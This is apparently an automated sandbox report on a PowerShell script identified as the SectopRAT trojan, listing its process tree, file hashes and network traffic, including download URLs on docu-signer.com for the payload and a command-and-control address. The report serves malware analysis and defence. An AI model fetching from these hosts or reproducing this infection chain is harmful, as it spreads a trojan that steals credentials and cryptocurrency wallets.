Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    17/12/2024, 07:22 UTC

General

  • Target

    SFHgtxFGtB.ps1

  • Size

    35KB

  • MD5

    6a34a3dbed524eed6d73c72188418d80

  • SHA1

    6a6ee1aa6ad9d9fbd7b7112df3a5c92b83c18667

  • SHA256

    45ab4ca2483759d89bc446e6797e86489eb08cfeb3f740440a83ff6d83eb5503

  • SHA512

    6fd7dc31836db3062aea0ab2bf0c7b0c45ee188fa9f2a872de968db2635aefc404d057444ec15ffea66585f6aa8e18acf2088e9523ac9138680ef6061465db30

  • SSDEEP

    96:YdgXCdz1ArDw1DQXZB08+uFk0WK49Ms00IYY+blwIAAwIYmEYsR0KkMEIIAAYwwP:EZu

Malware Config

Signatures

  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\SFHgtxFGtB.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Users\Admin\AppData\Local\Temp\62650356\updater.exe
      "C:\Users\Admin\AppData\Local\Temp\62650356\updater.exe" C:\Users\Admin\AppData\Local\Temp\62650356\XCBjmNiG.dll
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        3⤵
          PID:4272
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4832

    Network

    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      88.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      88.210.23.2.in-addr.arpa
      IN PTR
      Response
      88.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-88.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      71.31.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      71.31.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      docu-signer.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      docu-signer.com
      IN A
      Response
      docu-signer.com
      IN A
      172.67.142.2
      docu-signer.com
      IN A
      104.21.87.65
    • flag-us
      GET
      https://docu-signer.com/api/uz/0912545164/updater.bin
      powershell.exe
      Remote address:
      172.67.142.2:443
      Request
      GET /api/uz/0912545164/updater.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: docu-signer.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Tue, 17 Dec 2024 07:22:12 GMT
      Content-Type: application/octet-stream
      Content-Length: 893608
      Connection: keep-alive
      Last-Modified: Sun, 13 Oct 2024 09:57:05 GMT
      ETag: "670b9971-da2a8"
      Accept-Ranges: bytes
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qY%2B%2FTmUTCPpvwrcSJsdtw4F%2B9LOW3UAj8GJwz0aiYIIouSnTrSZBgMWpIHotrWvbYZkvG11EzArBfsapeuvdZ3Mn1AziqrTflOhLF4wsGRnR7pi2EfBOKPcKjJHAhfy6Ik%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8f3529226ad3ef42-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=28617&min_rtt=26165&rtt_var=9405&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2999&recv_bytes=488&delivery_rate=102581&cwnd=253&unsent_bytes=0&cid=dc7a0aa304a13762&ts=173&x=0"
    • flag-us
      GET
      https://docu-signer.com/api/uz/0912545164/log4cxx.dll
      powershell.exe
      Remote address:
      172.67.142.2:443
      Request
      GET /api/uz/0912545164/log4cxx.dll HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: docu-signer.com
      Response
      HTTP/1.1 200 OK
      Date: Tue, 17 Dec 2024 07:22:15 GMT
      Content-Type: application/octet-stream
      Content-Length: 2011444
      Connection: keep-alive
      Last-Modified: Sun, 15 Dec 2024 11:15:42 GMT
      ETag: "675eba5e-1eb134"
      Accept-Ranges: bytes
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6jB6OgVAxh2%2BaY7%2BcRk4iulMzdChovLZIFr9w2mc6%2F1AqW7wDJLvm4YsFcnqmeLMkBEgXyb8HBNzi%2BQZgvzpTnjxZn%2BoYn4%2BoYDtSY1agi7g2SQlt2nJSbwOVuwKOQPFp8%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8f352938e98def42-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=32966&min_rtt=25677&rtt_var=13506&sent=710&recv=375&lost=0&retrans=7&sent_bytes=910613&recv_bytes=682&delivery_rate=85033&cwnd=218&unsent_bytes=0&cid=dc7a0aa304a13762&ts=3732&x=0"
    • flag-us
      DNS
      2.142.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.142.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      236.124.147.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      236.124.147.185.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      28.118.140.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      28.118.140.52.in-addr.arpa
      IN PTR
      Response
    • flag-ru
      GET
      http://185.147.124.236:9000/wbinjget?q=03C896B1DF749923AAE30D910191B5B8
      MSBuild.exe
      Remote address:
      185.147.124.236:9000
      Request
      GET /wbinjget?q=03C896B1DF749923AAE30D910191B5B8 HTTP/1.1
      Host: 185.147.124.236:9000
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Cache-Control: no-cache
      Content-Length: 0
      Server: Microsoft-HTTPAPI/2.0
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
      Access-Control-Allow-Headers: *
      Access-Control-Expose-Headers:
      Accept: */*
      Accept-Language: en-US, en
      Accept-Charset: ISO-8859-1, utf-8
      Host: *:9000
      Date: Tue, 17 Dec 2024 07:22:28 GMT
      Connection: close
    • flag-us
      DNS
      212.20.149.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      212.20.149.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.42.69.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.42.69.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • 172.67.142.2:443
      https://docu-signer.com/api/uz/0912545164/log4cxx.dll
      tls, http
      powershell.exe
      65.8kB
      3.0MB
      1288
      2211

      HTTP Request

      GET https://docu-signer.com/api/uz/0912545164/updater.bin

      HTTP Response

      200

      HTTP Request

      GET https://docu-signer.com/api/uz/0912545164/log4cxx.dll

      HTTP Response

      200
    • 185.147.124.236:15647
      MSBuild.exe
      2.0MB
      51.2kB
      1444
      958
    • 185.147.124.236:9000
      http://185.147.124.236:9000/wbinjget?q=03C896B1DF749923AAE30D910191B5B8
      http
      MSBuild.exe
      343 B
      546 B
      5
      3

      HTTP Request

      GET http://185.147.124.236:9000/wbinjget?q=03C896B1DF749923AAE30D910191B5B8

      HTTP Response

      200
    • 8.8.8.8:53
      228.249.119.40.in-addr.arpa
      dns
      73 B
      159 B
      1
      1

      DNS Request

      228.249.119.40.in-addr.arpa

    • 8.8.8.8:53
      88.210.23.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      88.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      71.31.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      71.31.126.40.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      docu-signer.com
      dns
      powershell.exe
      61 B
      93 B
      1
      1

      DNS Request

      docu-signer.com

      DNS Response

      172.67.142.2
      104.21.87.65

    • 8.8.8.8:53
      2.142.67.172.in-addr.arpa
      dns
      71 B
      133 B
      1
      1

      DNS Request

      2.142.67.172.in-addr.arpa

    • 8.8.8.8:53
      236.124.147.185.in-addr.arpa
      dns
      74 B
      134 B
      1
      1

      DNS Request

      236.124.147.185.in-addr.arpa

    • 8.8.8.8:53
      28.118.140.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      28.118.140.52.in-addr.arpa

    • 8.8.8.8:53
      212.20.149.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      212.20.149.52.in-addr.arpa

    • 8.8.8.8:53
      241.42.69.40.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      241.42.69.40.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\62650356\XCBjmNiG.dll

      Filesize

      1.9MB

      MD5

      bcc04f3c8f29b9533c8aff0681d4eb4f

      SHA1

      2edb98e832959106bc3e6110dfb0a20a549bdcb1

      SHA256

      d0e19b9fed36046a80ca84c68624eeed3fac491962fc121d1d7b6433006990dc

      SHA512

      dcd54ae36962e5072be4b31e20bc7d42a4ff9d90e95930f09a0cbdb6e0f7495a38409defcacf072c8c452188dbbf4863f5f8e21a24f50d36ffdae61959176cf1

    • C:\Users\Admin\AppData\Local\Temp\62650356\updater.exe

      Filesize

      872KB

      MD5

      c56b5f0201a3b3de53e561fe76912bfd

      SHA1

      2a4062e10a5de813f5688221dbeb3f3ff33eb417

      SHA256

      237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

      SHA512

      195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4l0ndww4.ehb.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmpF9D4.tmp

      Filesize

      20KB

      MD5

      49693267e0adbcd119f9f5e02adf3a80

      SHA1

      3ba3d7f89b8ad195ca82c92737e960e1f2b349df

      SHA256

      d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

      SHA512

      b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

    • memory/1900-11-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

    • memory/1900-13-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

    • memory/1900-15-0x00007FFD31403000-0x00007FFD31405000-memory.dmp

      Filesize

      8KB

    • memory/1900-16-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

    • memory/1900-17-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

    • memory/1900-12-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

    • memory/1900-0-0x00007FFD31403000-0x00007FFD31405000-memory.dmp

      Filesize

      8KB

    • memory/1900-22-0x00007FFD31400000-0x00007FFD31EC1000-memory.dmp

      Filesize

      10.8MB

    • memory/1900-1-0x000001854A830000-0x000001854A852000-memory.dmp

      Filesize

      136KB

    • memory/1992-24-0x0000000001640000-0x0000000001A40000-memory.dmp

      Filesize

      4.0MB

    • memory/4832-31-0x0000000005070000-0x0000000005102000-memory.dmp

      Filesize

      584KB

    • memory/4832-38-0x00000000062B0000-0x00000000067DC000-memory.dmp

      Filesize

      5.2MB

    • memory/4832-29-0x00000000747BE000-0x00000000747BF000-memory.dmp

      Filesize

      4KB

    • memory/4832-32-0x00000000056D0000-0x0000000005C74000-memory.dmp

      Filesize

      5.6MB

    • memory/4832-33-0x00000000054A0000-0x0000000005662000-memory.dmp

      Filesize

      1.8MB

    • memory/4832-34-0x00000000051A0000-0x0000000005216000-memory.dmp

      Filesize

      472KB

    • memory/4832-35-0x0000000005230000-0x0000000005280000-memory.dmp

      Filesize

      320KB

    • memory/4832-37-0x00000000747B0000-0x0000000074F60000-memory.dmp

      Filesize

      7.7MB

    • memory/4832-36-0x0000000005150000-0x000000000515A000-memory.dmp

      Filesize

      40KB

    • memory/4832-30-0x0000000000400000-0x00000000004C6000-memory.dmp

      Filesize

      792KB

    • memory/4832-39-0x0000000005E40000-0x0000000005E5E000-memory.dmp

      Filesize

      120KB

    • memory/4832-40-0x0000000005F30000-0x0000000005F96000-memory.dmp

      Filesize

      408KB

    • memory/4832-28-0x0000000000400000-0x00000000004C6000-memory.dmp

      Filesize

      792KB

    • memory/4832-58-0x0000000007C00000-0x0000000007C0A000-memory.dmp

      Filesize

      40KB

    • memory/4832-60-0x00000000747BE000-0x00000000747BF000-memory.dmp

      Filesize

      4KB

    • memory/4832-61-0x00000000747B0000-0x0000000074F60000-memory.dmp

      Filesize

      7.7MB

    • memory/4832-62-0x00000000052F0000-0x0000000005302000-memory.dmp

      Filesize

      72KB

    • memory/4832-63-0x0000000005350000-0x000000000538C000-memory.dmp

      Filesize

      240KB
